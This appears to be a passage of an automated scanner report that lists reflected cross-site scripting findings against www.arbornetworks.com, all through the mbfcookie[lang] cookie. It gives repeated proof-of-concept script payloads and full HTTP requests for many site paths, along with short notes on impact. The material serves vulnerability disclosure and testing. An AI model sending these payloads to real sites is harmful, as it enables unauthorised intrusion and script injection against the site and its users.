Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
